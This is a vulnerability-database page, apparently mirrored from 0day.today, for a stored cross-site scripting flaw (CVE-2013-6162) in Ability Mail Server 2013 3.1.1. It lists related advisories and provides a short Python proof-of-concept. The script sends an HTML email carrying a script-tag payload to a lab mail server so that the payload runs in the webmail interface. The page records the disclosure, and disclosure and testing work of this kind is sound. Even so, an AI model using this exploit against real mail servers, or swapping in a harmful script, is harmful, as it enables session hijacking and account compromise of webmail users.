Lucene search
K

Ability Mail Server 2013 (3.1.1) - Stored XSS Vulnerability

🗓️ 17 Dec 2013 00:00:00Reported by David UmType 
zdt
 zdt
🔗 0day.today👁 31 Views

Ability Mail Server 2013 (3.1.1) - Stored XSS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-6162
17 Dec 201300:00
circl
CVE
CVE-2013-6162
21 Dec 201300:00
cve
Cvelist
CVE-2013-6162
21 Dec 201300:00
cvelist
Exploit DB
Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting
17 Dec 201300:00
exploitdb
EUVD
EUVD-2013-5991
7 Oct 202500:30
euvd
exploitpack
Ability-Mail-Server-2013
4 Jan 201517:21
exploitpack
exploitpack
Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting
17 Dec 201300:00
exploitpack
NVD
CVE-2013-6162
21 Dec 201300:55
nvd
Prion
Cross site scripting
21 Dec 201300:55
prion
seebug.org
Ability Mail Server 2013 (3.1.1) 存储型跨站脚本漏洞
18 Dec 201300:00
seebug
Rows per page
import smtplib
 
email_addr = '[email protected]'
 
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)
 
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()

#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Dec 2013 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00519
31